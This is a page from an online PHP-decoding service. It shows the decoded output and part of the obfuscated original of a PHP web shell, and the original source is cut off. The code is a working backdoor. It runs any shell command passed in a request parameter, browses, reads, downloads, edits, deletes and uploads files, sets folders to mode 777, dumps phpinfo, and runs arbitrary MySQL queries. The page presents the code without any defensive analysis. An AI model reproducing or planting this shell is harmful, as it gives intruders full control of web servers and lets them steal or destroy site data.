Find this useful? Enter your email to receive occasional updates for securing PHP code.

Signing you up...

Thank you for signing up!

PHP Decode

function isLinux($lGuFue) { return substr($lGuFue, 0, 1) == "\57" ? true : false; } functi..

Decoded Output download

<?  function isLinux($lGuFue) { return substr($lGuFue, 0, 1) == "/" ? true : false; } function getSlashDir($lGuFuO) { return $lGuFuO ? "/" : "\"; } $lGuFuF = getcwd(); $lGuFuO = isLinux($lGuFuF); if ($lGuFuO) { goto lmZOFee; } $lGuFua = substr($lGuFuF, 0, 1); lmZOFee: $lGuFuu = getSlashDir($lGuFuO); $lGuFuc = explode($lGuFuu, $lGuFuF); $lGuFuq = $lGuFuO ? $lGuFuu : $lGuFua . ":" . $lGuFuu; function cleanPath($lGuFue, $lGuFuO) { goto lmZOFOK; lmZOFFc: lmZOFOZ: goto lmZOFFq; lmZOFFa: if (!($lGuFuZ == '')) { goto lmZOFOZ; } goto lmZOFFu; lmZOFFh: lmZOFOS: goto lmZOFFb; lmZOFFu: $lGuFuZ = $lGuFuO ? $lGuFuu : $lGuFua . ":" . $lGuFuu; goto lmZOFFc; lmZOFOG: reset($lGuFuc); goto lmZOFFe; lmZOFOX: foreach ($lGuFuc as $lGuFum => $lGuFuh) { goto lmZOFeq; lmZOFem: if ($lGuFuh == ".") { goto lmZOFec; } goto lmZOFeh; lmZOFet: goto lmZOFea; goto lmZOFeX; lmZOFeS: $lGuFub = $lGuFum - 1; goto lmZOFeK; lmZOFeh: goto lmZOFea; goto lmZOFeb; lmZOFeb: lmZOFeu: goto lmZOFeZ; lmZOFeZ: $lGuFuc[$lGuFum] = ''; goto lmZOFeS; lmZOFeK: $lGuFuc[$lGuFub] = ''; goto lmZOFet; lmZOFeq: if ($lGuFuh == "..") { goto lmZOFeu; } goto lmZOFem; lmZOFeG: $lGuFuc[$lGuFum] = ''; goto lmZOFOe; lmZOFeX: lmZOFec: goto lmZOFeG; lmZOFOe: lmZOFea: goto lmZOFOO; lmZOFOO: } goto lmZOFOG; lmZOFOK: $lGuFuu = getSlashDir($lGuFuO); goto lmZOFOt; lmZOFFO: $lGuFuS = true; goto lmZOFFF; lmZOFFF: foreach ($lGuFuc as $lGuFuh) { goto lmZOFOc; lmZOFOq: $lGuFuZ .= ($lGuFuS ? '' : $lGuFuu) . $lGuFuh; goto lmZOFOm; lmZOFOm: $lGuFuS = false; goto lmZOFOh; lmZOFOc: if (!($lGuFuh != '')) { goto lmZOFOu; } goto lmZOFOq; lmZOFOh: lmZOFOu: goto lmZOFOb; lmZOFOb: } goto lmZOFFa; lmZOFFb: return $lGuFuZ; goto lmZOFFZ; lmZOFOt: $lGuFuc = explode($lGuFuu, $lGuFue); goto lmZOFOX; lmZOFFe: $lGuFuZ = $lGuFuO ? "/" : ''; goto lmZOFFO; lmZOFFm: $lGuFuZ .= $lGuFuu; goto lmZOFFh; lmZOFFq: if (!(substr($lGuFuZ, -1) != $lGuFuu)) { goto lmZOFOS; } goto lmZOFFm; lmZOFFZ: } if (isset($_REQUEST["chm"])) { goto lmZOFqu; } if (isset($_REQUEST["phpinfo"])) { goto lmZOFqc; } if (isset($_REQUEST["dl"])) { goto lmZOFqq; } if (isset($_REQUEST["gz"])) { goto lmZOFqm; } if (isset($_REQUEST["f"])) { goto lmZOFqh; } if (isset($_REQUEST["d"])) { goto lmZOFqb; } if (isset($_REQUEST["c"])) { goto lmZOFqZ; } if (isset($_REQUEST["uploadForm"]) || isset($_FILES["file_name"])) { goto lmZOFqS; } if (isset($_REQUEST["cc"])) { goto lmZOFqK; } if (isset($_REQUEST["mquery"])) { goto lmZOFqt; } if (isset($_REQUEST["df"])) { goto lmZOFqX; } if (isset($_REQUEST["ef"])) { goto lmZOFqG; } echo " \xd\xa<b>Server Information:</b><br /> \xd\xa<i> 
\xaOperating System: "; echo PHP_OS; echo "<br /> \xd\xaPHP Version: "; echo PHP_VERSION; echo "<br /> \xd
<a href="?phpinfo=true">View phpinfo</a> \xd
</i> 
\xa<br /> 
\xa<br /> \xd
<b>Directory Traversal</b><br /> \xd
<a href="?d="; echo getcwd(); echo ""><b>Go to current working directory</b></a> <br /> \xd\xa<a href="?d="; echo $lGuFuq; echo ""><b>Go to root directory</b></a> <br /> 
\xa<b>Go to any directory:</b> <form action="" method="GET"><input type="text" name="d" value=""; echo $lGuFuq; echo "" /><input type="submit" value="Go" /></form> 

\xa\xd\xa
\xa<hr>Execute MySQL Query: 
<form action="" METHOD="GET" > \xd
<table> 
\xa<tr><td>host</td><td><input type="text" name="host"value="localhost"> </td></tr> 
<tr><td>user</td><td><input type="text" name="usr" value="root"> </td></tr> 
\xa<tr><td>password</td><td><input type="text" name="passwd"> </td></tr> 
<tr><td>database</td><td><input type="text" name="db"> </td></tr> 
\xa<tr><td valign="top">query</td><td><textarea name="mquery" rows="6" cols="65"></textarea> </td></tr> 
\xa<tr><td colspan="2"><input type="submit" value="execute"></td></tr> \xd
</table> \xd\xa</form> 
\xa<hr> 
<pre><form action="" METHOD="GET" >Execute Shell Command (safe mode is "; echo @ini_get("safe_mode") ? "on" : "off"; echo "): <input type="text" name="c"><input type="submit" value="Go"></form>  
"; goto lmZOFqa; lmZOFqu: if (!$lGuFuO) { goto lmZOFFS; } echo @chmod($_REQUEST["chm"], 0777) ? "Reassigned" : "Can't Reasign"; goto lmZOFFK; lmZOFFS: echo "This feature only works on Linux"; lmZOFFK: goto lmZOFqa; lmZOFqc: phpinfo(); goto lmZOFqa; lmZOFqq: if (@fopen($_REQUEST["dl"] . $_REQUEST["file"], "r") == true) { goto lmZOFFX; } echo $_REQUEST["dl"]; goto lmZOFFG; lmZOFFX: $_REQUEST["dl"] .= $_REQUEST["file"]; if (!(substr($_REQUEST["dl"], 0, 1) == $lGuFuu)) { goto lmZOFFt; } $lGuFuK = explode($lGuFuu, $_REQUEST["dl"]); lmZOFFt: header("Content-disposition: attachment; filename=" . $_REQUEST["file"]); header("Content-type: application/octet-stream"); readfile($_REQUEST["dl"]); lmZOFFG: goto lmZOFqa; lmZOFqm: if (!$lGuFuO) { goto lmZOFaa; } $lGuFut = $_REQUEST["gz"]; if (!(substr($lGuFut, -1) == "/")) { goto lmZOFae; } $lGuFut = substr($lGuFut, 0, -1); lmZOFae: $lGuFuX = explode($lGuFuu, $lGuFut); $lGuFuG = $lGuFuX[sizeof($lGuFuX) - 1]; $lGuFce = time(); exec("cd {$lGuFut}; tar czf {$lGuFce} *"); $lGuFcO = @file_get_contents($lGuFut . "/" . $lGuFce); if (!$lGuFcO) { goto lmZOFaO; } header("Content-disposition: attachment; filename={$lGuFuG}.tgz"); echo $lGuFcO; goto lmZOFaF; lmZOFaO: header("Content-disposition: attachment; filename=ACCESS_PROBLEM"); lmZOFaF: header("Content-type: application/octet-stream"); @unlink($lGuFut . "/" . $lGuFce); goto lmZOFau; lmZOFaa: echo "This feature only works on Linux"; lmZOFau: goto lmZOFqa; lmZOFqh: $lGuFcF = $_REQUEST["f"]; $lGuFca = fopen("{$lGuFcF}", "rb"); header("Content-Type: text/plain"); fpassthru($lGuFca); goto lmZOFqa; lmZOFqb: $lGuFcu = $_REQUEST["d"]; echo "<pre>"; if ($lGuFcc = opendir("{$lGuFcu}")) { goto lmZOFub; } echo "opendir() failed"; goto lmZOFuZ; lmZOFub: echo "<h2>listing of "; $lGuFcq = ''; if (!$lGuFuO) { goto lmZOFac; } echo "<a href='?d={$lGuFuu}'>{$lGuFuu}</a>"; lmZOFac: foreach (explode($lGuFuu, cleanPath($lGuFcu, $lGuFuO)) as $lGuFuh) { $lGuFcq .= $lGuFuh . $lGuFuu; echo "<a href='?d={$lGuFcq}'>" . $lGuFuh . "</a>" . ($lGuFuh != '' ? $lGuFuu : ''); } echo " (<a target='_blank' href='?uploadForm=1&dir=" . urlencode(cleanPath($lGuFcu, $lGuFuO)) . "'>upload file</a>) (<a href='?d=" . urlencode(cleanPath($lGuFcu, $lGuFuO)) . "&hldb=1'>DB interaction files in red</a>)</h2> (<a target='_blank' href='?gz=" . urlencode(cleanPath($lGuFcu, $lGuFuO)) . "'>gzip & download folder</a>) (<a target='_blank' href='?chm=" . urlencode(cleanPath($lGuFcu, $lGuFuO)) . "'>chmod folder to 777)</a> (these rarely work)<br />"; while ($lGuFcm = readdir($lGuFcc)) { if (is_dir("{$lGuFcu}{$lGuFuu}{$lGuFcm}")) { goto lmZOFaG; } if (isset($_REQUEST["hldb"])) { goto lmZOFat; } $lGuFcZ[] = array("dir" => $lGuFcm, "color" => "black"); goto lmZOFaX; lmZOFat: $lGuFcb = file_get_contents("{$lGuFcu}{$lGuFuu}{$lGuFcm}"); if (stripos($lGuFcb, "mysql_") || stripos($lGuFcb, "mysqli_") || stripos($lGuFcb, "SELECT ")) { goto lmZOFaS; } $lGuFcZ[] = array("dir" => $lGuFcm, "color" => "black"); goto lmZOFaK; lmZOFaS: $lGuFcZ[] = array("dir" => $lGuFcm, "color" => "red"); lmZOFaK: lmZOFaX: goto lmZOFue; lmZOFaG: if (!($lGuFcm != "." && $lGuFcm != "..")) { goto lmZOFaZ; } $lGuFch[] = $lGuFcm; lmZOFaZ: lmZOFue: } echo "<a href='?d={$lGuFcu}{$lGuFuu}.'><font color=grey>.
</font></a>"; echo "<a href='?d={$lGuFcu}{$lGuFuu}..'><font color=grey>..
</font></a>"; if (!isset($lGuFch)) { goto lmZOFuu; } if (!is_array($lGuFch)) { goto lmZOFua; } foreach ($lGuFch as $lGuFcm) { echo "<a href='?d={$lGuFcu}{$lGuFuu}{$lGuFcm}'><font color=grey>{$lGuFcm}
</font></a>"; } lmZOFua: lmZOFuu: if (!isset($lGuFcZ)) { goto lmZOFuh; } if (!is_array($lGuFcZ)) { goto lmZOFum; } foreach ($lGuFcZ as $lGuFcm) { echo "<a href='?f={$lGuFcu}" . $lGuFuu . $lGuFcm["dir"] . "'><font color=" . $lGuFcm["color"] . ">" . $lGuFcm["dir"] . "</font></a>" . "|<a href='?dl=" . cleanPath($lGuFcu, $lGuFuO) . "&file=" . $lGuFcm["dir"] . "' target='_blank'>Download</a>|" . "|<a href='?ef=" . cleanPath($lGuFcu, $lGuFuO) . "&file=" . $lGuFcm["dir"] . "' target='_blank'>Edit</a>|" . "|<a href='?df=" . cleanPath($lGuFcu, $lGuFuO) . "&file=" . $lGuFcm["dir"] . "' target='_blank'>Delete</a>| 
"; } lmZOFum: lmZOFuh: lmZOFuZ: closedir($lGuFcc); goto lmZOFqa; lmZOFqZ: if (!@ini_get("safe_mode")) { goto lmZOFuS; } echo "Safe mode is on, the command is by default run though escapeshellcmd() and can only run programms in safe_mod_exec_dir (" . @ini_get("safe_mode_exec_dir") . ") <br />"; lmZOFuS: echo "<b>Command: <I>" . $_REQUEST["c"] . "</I></b><br /><br />"; trim(exec($_REQUEST["c"], $lGuFcS)); foreach ($lGuFcS as $lGuFuh) { echo "<pre>" . htmlentities($lGuFuh) . "</pre>"; } goto lmZOFqa; lmZOFqS: if (isset($_FILES["file_name"])) { goto lmZOFca; } echo " \xd
        <form target="_blank" action="" method="GET"> 
            <input type="hidden" name="cc" value="1" /> \xd
            Submit this form before submitting file (will open in new window):<br /> \xd\xa            Upload Directory: <input type="text" name="dir" value=""; echo $_REQUEST["dir"]; echo ""><br /> \xd
            <input type="submit" value="submit" /> \xd\xa        </form> 
\xa        <br /><br /> \xd\xa         \xd
        <form enctype="multipart/form-data" action="" method="post"> 
\xa        Upload file:<input name="file_name" type="file"> <input type="submit" value="Upload" /></form> 

\xa        "; goto lmZOFcu; lmZOFca: if ($_FILES["file_name"]["error"] > 0) { goto lmZOFcO; } $lGuFcK = $_COOKIE["uploadDir"]; if (!(substr($lGuFcK, -1) != "/")) { goto lmZOFuX; } $lGuFcK .= "/"; lmZOFuX: $lGuFcK = $lGuFcK . basename($_FILES["file_name"]["name"]); if (move_uploaded_file($_FILES["file_name"]["tmp_name"], $lGuFcK)) { goto lmZOFuG; } echo "Error copying file, likely a permission error."; goto lmZOFce; lmZOFuG: setcookie("uploadDir", ''); echo "The file " . basename($_FILES["file_name"]["name"]) . " has been uploaded"; lmZOFce: goto lmZOFcF; lmZOFcO: echo "Error"; lmZOFcF: lmZOFcu: goto lmZOFqa; lmZOFqK: setcookie("uploadDir", $_GET["dir"]); echo "You are OK to upload the file, don't upload files to other directories before completing this upload."; goto lmZOFqa; lmZOFqt: $lGuFct = $_REQUEST["host"]; $lGuFcX = $_REQUEST["usr"]; $lGuFcG = $_REQUEST["passwd"]; $lGuFqe = $_REQUEST["db"]; $lGuFqO = $_REQUEST["mquery"]; @mysql_connect($lGuFct, $lGuFcX, $lGuFcG) or die("Connection Error: " . mysql_error()); mysql_select_db($lGuFqe); $lGuFqF = mysql_query($lGuFqO); if ($lGuFqF != false) { goto lmZOFcK; } echo "Query Error: " . mysql_error(); goto lmZOFct; lmZOFcK: echo "<h2>The following query has sucessfully executed</h2>" . htmlentities($lGuFqO) . "<br /><br />"; echo "Return Results:<br />"; $lGuFqa = true; echo "<table border='1'>"; while ($lGuFqu = mysql_fetch_array($lGuFqF, MYSQL_ASSOC)) { if (!$lGuFqa) { goto lmZOFcb; } echo "<tr>"; foreach ($lGuFqu as $lGuFum => $lGuFuh) { echo "<td><b>{$lGuFum}</b></td>"; } echo "</tr>"; reset($lGuFqu); $lGuFqa = false; lmZOFcb: echo "<tr>"; foreach ($lGuFqu as $lGuFuh) { echo "<td>{$lGuFuh}</td>"; } echo "</tr>"; } echo "</table>"; mysql_free_result($lGuFqF); lmZOFct: goto lmZOFqa; lmZOFqX: $_REQUEST["df"] .= $lGuFuu . $_REQUEST["file"]; if (@unlink($_REQUEST["df"])) { goto lmZOFcX; } echo "Error deleting file"; goto lmZOFcG; lmZOFcX: echo "File deleted"; lmZOFcG: goto lmZOFqa; lmZOFqG: echo " 
\xa<script type="text/javascript"> \xd\xa  <!-- 
\xa
  var key = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/="; \xd

  function encode64(inpStr)  
\xa  { 
     inpStr = escape(inpStr); 
\xa     var output = ""; 
     var chr1, chr2, chr3 = ""; 
     var enc1, enc2, enc3, enc4 = ""; \xd
     var i = 0; \xd
\xd
     do { \xd\xa        chr1 = inpStr.charCodeAt(i++); 
\xa        chr2 = inpStr.charCodeAt(i++); \xd
        chr3 = inpStr.charCodeAt(i++); 

        enc1 = chr1 >> 2; \xd\xa        enc2 = ((chr1 & 3) << 4) | (chr2 >> 4); 
        enc3 = ((chr2 & 15) << 2) | (chr3 >> 6); 
        enc4 = chr3 & 63; 

\xa        if (isNaN(chr2))  
        { \xd\xa           enc3 = enc4 = 64; 
        }  
\xa        else if (isNaN(chr3))  
        { 
           enc4 = 64; 
        } 

        output = output + \xd\xa           key.charAt(enc1) + 
           key.charAt(enc2) + 
           key.charAt(enc3) + \xd\xa           key.charAt(enc4); 
        chr1 = chr2 = chr3 = enc1 = enc2 = enc3 = enc4 = ""; 
     } while (i < inpStr.length); \xd\xa
\xa     return output; 
  } \xd\xa\xd
  //--></script> 

\xa  "; $_REQUEST["ef"] .= $_REQUEST["file"]; if (!isset($_POST["newcontent"])) { goto lmZOFqF; } $_POST["newcontent"] = urldecode(base64_decode($_POST["newcontent"])); $lGuFqc = @fopen($_REQUEST["ef"], "w"); if ($lGuFqc) { goto lmZOFqe; } echo "Could not write to file"; goto lmZOFqO; lmZOFqe: fwrite($lGuFqc, $_POST["newcontent"]); echo "Write sucessful"; lmZOFqO: fclose($lGuFqc); lmZOFqF: echo " 
    <form action="" name="f" method="POST"> 
\xa    <textarea wrap="off" rows="40" cols="130" name="newcontent">"; echo file_get_contents($_REQUEST["ef"]); echo "</textarea><br /> 
\xa    <input type="submit" value="I base64 encoded it myself, dont run script" /><br /> 
\xa    <input type="submit" value="Change (requires javascript to work)"  onclick="document.f.newcontent.value=encode64(document.f.newcontent.value);" />\xd
    </form> \xd\xa    "; lmZOFqa: ?>

Did this file decode correctly?

Original Code

function isLinux($lGuFue) { return substr($lGuFue, 0, 1) == "\57" ? true : false; } function getSlashDir($lGuFuO) { return $lGuFuO ? "\57" : "\134"; } $lGuFuF = getcwd(); $lGuFuO = isLinux($lGuFuF); if ($lGuFuO) { goto lmZOFee; } $lGuFua = substr($lGuFuF, 0, 1); lmZOFee: $lGuFuu = getSlashDir($lGuFuO); $lGuFuc = explode($lGuFuu, $lGuFuF); $lGuFuq = $lGuFuO ? $lGuFuu : $lGuFua . "\72" . $lGuFuu; function cleanPath($lGuFue, $lGuFuO) { goto lmZOFOK; lmZOFFc: lmZOFOZ: goto lmZOFFq; lmZOFFa: if (!($lGuFuZ == '')) { goto lmZOFOZ; } goto lmZOFFu; lmZOFFh: lmZOFOS: goto lmZOFFb; lmZOFFu: $lGuFuZ = $lGuFuO ? $lGuFuu : $lGuFua . "\72" . $lGuFuu; goto lmZOFFc; lmZOFOG: reset($lGuFuc); goto lmZOFFe; lmZOFOX: foreach ($lGuFuc as $lGuFum => $lGuFuh) { goto lmZOFeq; lmZOFem: if ($lGuFuh == "\56") { goto lmZOFec; } goto lmZOFeh; lmZOFet: goto lmZOFea; goto lmZOFeX; lmZOFeS: $lGuFub = $lGuFum - 1; goto lmZOFeK; lmZOFeh: goto lmZOFea; goto lmZOFeb; lmZOFeb: lmZOFeu: goto lmZOFeZ; lmZOFeZ: $lGuFuc[$lGuFum] = ''; goto lmZOFeS; lmZOFeK: $lGuFuc[$lGuFub] = ''; goto lmZOFet; lmZOFeq: if ($lGuFuh == "\x2e\56") { goto lmZOFeu; } goto lmZOFem; lmZOFeG: $lGuFuc[$lGuFum] = ''; goto lmZOFOe; lmZOFeX: lmZOFec: goto lmZOFeG; lmZOFOe: lmZOFea: goto lmZOFOO; lmZOFOO: } goto lmZOFOG; lmZOFOK: $lGuFuu = getSlashDir($lGuFuO); goto lmZOFOt; lmZOFFO: $lGuFuS = true; goto lmZOFFF; lmZOFFF: foreach ($lGuFuc as $lGuFuh) { goto lmZOFOc; lmZOFOq: $lGuFuZ .= ($lGuFuS ? '' : $lGuFuu) . $lGuFuh; goto lmZOFOm; lmZOFOm: $lGuFuS = false; goto lmZOFOh; lmZOFOc: if (!($lGuFuh != '')) { goto lmZOFOu; } goto lmZOFOq; lmZOFOh: lmZOFOu: goto lmZOFOb; lmZOFOb: } goto lmZOFFa; lmZOFFb: return $lGuFuZ; goto lmZOFFZ; lmZOFOt: $lGuFuc = explode($lGuFuu, $lGuFue); goto lmZOFOX; lmZOFFe: $lGuFuZ = $lGuFuO ? "\x2f" : ''; goto lmZOFFO; lmZOFFm: $lGuFuZ .= $lGuFuu; goto lmZOFFh; lmZOFFq: if (!(substr($lGuFuZ, -1) != $lGuFuu)) { goto lmZOFOS; } goto lmZOFFm; lmZOFFZ: } if (isset($_REQUEST["\143\150\x6d"])) { goto lmZOFqu; } if (isset($_REQUEST["\160\x68\160\x69\x6e\146\x6f"])) { goto lmZOFqc; } if (isset($_REQUEST["\144\154"])) { goto lmZOFqq; } if (isset($_REQUEST["\x67\172"])) { goto lmZOFqm; } if (isset($_REQUEST["\146"])) { goto lmZOFqh; } if (isset($_REQUEST["\144"])) { goto lmZOFqb; } if (isset($_REQUEST["\x63"])) { goto lmZOFqZ; } if (isset($_REQUEST["\165\160\x6c\157\x61\144\106\x6f\x72\x6d"]) || isset($_FILES["\x66\151\154\145\137\x6e\x61\x6d\145"])) { goto lmZOFqS; } if (isset($_REQUEST["\x63\x63"])) { goto lmZOFqK; } if (isset($_REQUEST["\155\161\x75\145\x72\x79"])) { goto lmZOFqt; } if (isset($_REQUEST["\144\146"])) { goto lmZOFqX; } if (isset($_REQUEST["\145\x66"])) { goto lmZOFqG; } echo "\x20\xd\xa\74\142\x3e\x53\145\162\x76\145\162\40\x49\x6e\x66\157\162\155\x61\x74\151\157\x6e\x3a\74\57\x62\76\x3c\x62\162\40\57\76\x20\xd\xa\x3c\151\76\x20\15\xa\117\x70\145\x72\141\x74\x69\x6e\x67\x20\123\x79\x73\164\145\x6d\x3a\x20"; echo PHP_OS; echo "\74\x62\x72\x20\57\x3e\x20\xd\xa\120\110\x50\40\x56\x65\162\163\151\x6f\156\x3a\40"; echo PHP_VERSION; echo "\x3c\142\x72\40\x2f\76\40\xd\12\74\141\40\150\162\x65\x66\75\42\77\x70\150\x70\x69\156\x66\x6f\x3d\164\162\165\145\x22\x3e\126\151\x65\167\x20\x70\150\160\151\156\x66\x6f\x3c\57\141\x3e\x20\xd\12\x3c\x2f\x69\x3e\40\15\xa\x3c\x62\162\40\57\x3e\x20\15\xa\74\142\162\x20\x2f\x3e\40\xd\12\74\142\76\104\151\x72\145\x63\x74\x6f\x72\x79\x20\x54\x72\141\x76\x65\x72\x73\x61\x6c\74\57\x62\76\74\142\x72\x20\x2f\x3e\x20\xd\12\x3c\141\x20\150\162\x65\x66\75\42\77\x64\x3d"; echo getcwd(); echo "\42\x3e\74\142\x3e\x47\x6f\x20\164\157\40\143\165\x72\x72\x65\x6e\164\x20\x77\157\x72\153\151\x6e\x67\x20\144\151\x72\x65\143\x74\x6f\x72\171\74\x2f\x62\76\x3c\57\x61\x3e\x20\x3c\x62\x72\40\57\x3e\40\xd\xa\74\141\40\150\x72\145\146\x3d\x22\77\x64\75"; echo $lGuFuq; echo "\x22\x3e\x3c\142\x3e\107\157\40\164\157\x20\162\x6f\x6f\164\x20\x64\151\x72\145\143\164\x6f\x72\x79\x3c\x2f\142\76\74\57\141\76\x20\x3c\x62\x72\40\x2f\76\x20\15\xa\x3c\142\x3e\x47\157\x20\164\x6f\x20\x61\156\x79\x20\x64\x69\x72\145\x63\164\x6f\x72\171\x3a\x3c\x2f\x62\76\x20\74\146\157\162\x6d\x20\141\143\x74\x69\x6f\156\75\42\x22\x20\155\x65\164\x68\157\x64\x3d\x22\x47\105\x54\42\76\x3c\151\x6e\x70\x75\164\40\x74\171\160\x65\75\x22\x74\x65\170\164\x22\40\156\x61\x6d\145\x3d\x22\x64\x22\x20\166\141\x6c\x75\145\x3d\x22"; echo $lGuFuq; echo "\42\40\57\76\x3c\151\156\160\x75\164\40\x74\171\x70\x65\75\42\x73\x75\x62\x6d\151\x74\x22\40\166\x61\x6c\165\x65\75\42\x47\157\x22\x20\57\x3e\74\57\146\157\x72\x6d\x3e\x20\15\12\15\xa\xd\xa\15\xa\74\150\162\76\105\170\145\143\165\164\145\40\x4d\171\x53\121\114\40\121\165\x65\x72\x79\x3a\40\15\12\74\x66\157\x72\155\x20\141\143\x74\151\157\x6e\75\42\x22\40\x4d\105\x54\110\117\x44\75\42\107\x45\x54\x22\40\76\40\xd\12\74\x74\x61\142\154\145\x3e\x20\15\xa\74\x74\x72\x3e\x3c\164\x64\76\150\157\x73\x74\74\57\x74\x64\76\74\x74\144\x3e\74\x69\156\x70\165\x74\40\164\x79\x70\145\75\x22\x74\x65\170\164\42\x20\x6e\x61\155\145\x3d\42\150\x6f\163\x74\x22\166\x61\154\165\145\75\x22\x6c\x6f\x63\141\x6c\150\157\x73\x74\42\x3e\x20\x3c\x2f\164\144\76\x3c\57\164\x72\x3e\40\15\12\x3c\x74\162\x3e\74\x74\x64\x3e\x75\x73\145\162\74\57\164\144\x3e\x3c\164\x64\x3e\x3c\x69\x6e\160\165\x74\x20\x74\x79\x70\x65\x3d\x22\x74\145\170\164\42\40\x6e\141\x6d\145\75\42\165\x73\162\x22\40\x76\141\154\165\x65\75\42\162\157\x6f\164\x22\x3e\40\74\57\164\144\x3e\74\x2f\x74\x72\x3e\40\15\xa\74\164\162\76\x3c\164\x64\76\160\141\163\x73\x77\x6f\162\x64\x3c\x2f\164\x64\x3e\74\x74\x64\76\x3c\x69\156\160\x75\164\x20\x74\x79\x70\145\x3d\x22\164\x65\170\x74\x22\x20\156\141\155\x65\x3d\42\x70\x61\163\x73\167\x64\42\x3e\x20\x3c\x2f\x74\x64\x3e\74\x2f\x74\x72\x3e\x20\15\12\x3c\164\162\76\74\164\144\x3e\x64\141\x74\x61\142\x61\x73\x65\x3c\57\x74\144\76\x3c\x74\144\76\74\151\x6e\x70\165\x74\40\x74\171\160\x65\75\42\164\145\x78\x74\x22\x20\x6e\x61\x6d\x65\x3d\x22\144\x62\x22\x3e\40\x3c\57\164\144\76\x3c\57\x74\162\76\x20\15\xa\x3c\x74\x72\76\74\x74\x64\x20\x76\x61\154\151\147\156\75\42\164\157\160\42\x3e\161\165\x65\162\x79\74\57\164\x64\76\74\164\x64\76\x3c\x74\x65\170\164\x61\x72\145\141\40\x6e\x61\155\x65\75\x22\x6d\161\x75\145\162\x79\x22\x20\x72\x6f\x77\x73\75\x22\66\42\40\143\157\154\x73\x3d\42\66\x35\x22\76\x3c\57\164\x65\170\x74\x61\162\x65\x61\76\40\x3c\x2f\x74\x64\76\x3c\x2f\164\x72\76\40\15\xa\74\x74\162\76\74\164\x64\x20\143\x6f\154\163\160\141\156\75\42\x32\42\76\74\151\x6e\160\x75\x74\x20\164\x79\x70\145\x3d\42\163\x75\142\x6d\x69\x74\42\40\166\x61\x6c\165\x65\75\42\x65\170\145\143\x75\164\x65\42\76\x3c\x2f\164\x64\76\x3c\57\x74\162\76\40\xd\12\x3c\57\x74\x61\142\x6c\145\x3e\x20\xd\xa\74\x2f\x66\157\x72\x6d\76\40\15\xa\x3c\150\x72\76\40\15\12\x3c\x70\162\145\x3e\x3c\146\157\x72\x6d\40\141\143\x74\151\x6f\x6e\x3d\42\42\40\115\105\x54\x48\x4f\x44\75\x22\107\105\x54\x22\40\76\105\x78\x65\143\165\164\145\40\123\150\x65\154\154\x20\x43\x6f\x6d\x6d\x61\x6e\x64\40\50\163\x61\146\145\40\155\157\x64\x65\40\151\x73\x20"; echo @ini_get("\x73\141\x66\x65\137\x6d\x6f\x64\x65") ? "\x6f\156" : "\x6f\x66\x66"; echo "\x29\72\x20\x3c\x69\x6e\160\165\x74\40\x74\x79\160\145\75\42\164\x65\x78\164\42\x20\x6e\141\x6d\145\x3d\x22\143\x22\x3e\74\x69\156\x70\x75\x74\x20\x74\x79\x70\145\x3d\42\163\x75\142\155\151\164\x22\x20\x76\141\x6c\x75\x65\75\42\x47\157\x22\76\74\x2f\x66\157\162\x6d\76\x20\40\15\12"; goto lmZOFqa; lmZOFqu: if (!$lGuFuO) { goto lmZOFFS; } echo @chmod($_REQUEST["\143\150\x6d"], 0777) ? "\x52\145\x61\163\x73\x69\x67\156\145\144" : "\x43\141\156\47\x74\x20\122\145\141\x73\151\x67\x6e"; goto lmZOFFK; lmZOFFS: echo "\x54\150\x69\x73\40\146\145\x61\x74\x75\x72\145\40\157\156\x6c\171\x20\167\x6f\x72\x6b\163\40\x6f\156\x20\114\x69\x6e\x75\x78"; lmZOFFK: goto lmZOFqa; lmZOFqc: phpinfo(); goto lmZOFqa; lmZOFqq: if (@fopen($_REQUEST["\x64\154"] . $_REQUEST["\146\151\154\x65"], "\162") == true) { goto lmZOFFX; } echo $_REQUEST["\144\x6c"]; goto lmZOFFG; lmZOFFX: $_REQUEST["\x64\x6c"] .= $_REQUEST["\x66\151\154\145"]; if (!(substr($_REQUEST["\x64\154"], 0, 1) == $lGuFuu)) { goto lmZOFFt; } $lGuFuK = explode($lGuFuu, $_REQUEST["\144\154"]); lmZOFFt: header("\x43\157\x6e\164\x65\156\x74\x2d\x64\x69\163\160\157\x73\151\x74\151\x6f\156\72\x20\141\x74\x74\x61\143\x68\155\145\156\164\x3b\x20\x66\x69\x6c\145\156\x61\155\145\x3d" . $_REQUEST["\x66\x69\x6c\145"]); header("\103\157\x6e\x74\x65\x6e\x74\55\164\171\160\145\x3a\40\141\x70\x70\154\x69\143\x61\x74\151\x6f\x6e\x2f\x6f\143\164\145\164\55\x73\164\162\145\141\155"); readfile($_REQUEST["\x64\x6c"]); lmZOFFG: goto lmZOFqa; lmZOFqm: if (!$lGuFuO) { goto lmZOFaa; } $lGuFut = $_REQUEST["\x67\172"]; if (!(substr($lGuFut, -1) == "\57")) { goto lmZOFae; } $lGuFut = substr($lGuFut, 0, -1); lmZOFae: $lGuFuX = explode($lGuFuu, $lGuFut); $lGuFuG = $lGuFuX[sizeof($lGuFuX) - 1]; $lGuFce = time(); exec("\x63\x64\x20{$lGuFut}\73\x20\x74\141\162\x20\x63\172\x66\40{$lGuFce}\x20\52"); $lGuFcO = @file_get_contents($lGuFut . "\57" . $lGuFce); if (!$lGuFcO) { goto lmZOFaO; } header("\x43\x6f\156\x74\x65\156\x74\55\x64\151\x73\160\x6f\163\x69\x74\x69\x6f\156\x3a\x20\x61\x74\x74\x61\143\x68\155\x65\x6e\x74\73\x20\146\151\x6c\145\x6e\141\155\145\75{$lGuFuG}\56\164\x67\172"); echo $lGuFcO; goto lmZOFaF; lmZOFaO: header("\x43\157\x6e\x74\145\156\164\x2d\x64\x69\x73\x70\157\163\x69\x74\x69\157\156\72\x20\141\164\x74\141\143\150\155\x65\156\x74\x3b\x20\x66\x69\154\x65\156\x61\x6d\145\x3d\x41\x43\x43\x45\x53\123\137\x50\122\x4f\102\114\x45\115"); lmZOFaF: header("\103\x6f\x6e\x74\145\x6e\x74\x2d\164\x79\x70\145\x3a\x20\141\160\x70\154\151\143\141\164\x69\x6f\156\x2f\157\143\164\x65\x74\x2d\163\164\x72\145\x61\x6d"); @unlink($lGuFut . "\x2f" . $lGuFce); goto lmZOFau; lmZOFaa: echo "\x54\x68\x69\x73\40\x66\x65\x61\164\x75\162\x65\x20\x6f\x6e\154\171\40\x77\x6f\x72\153\163\40\157\x6e\x20\114\x69\x6e\x75\170"; lmZOFau: goto lmZOFqa; lmZOFqh: $lGuFcF = $_REQUEST["\146"]; $lGuFca = fopen("{$lGuFcF}", "\162\142"); 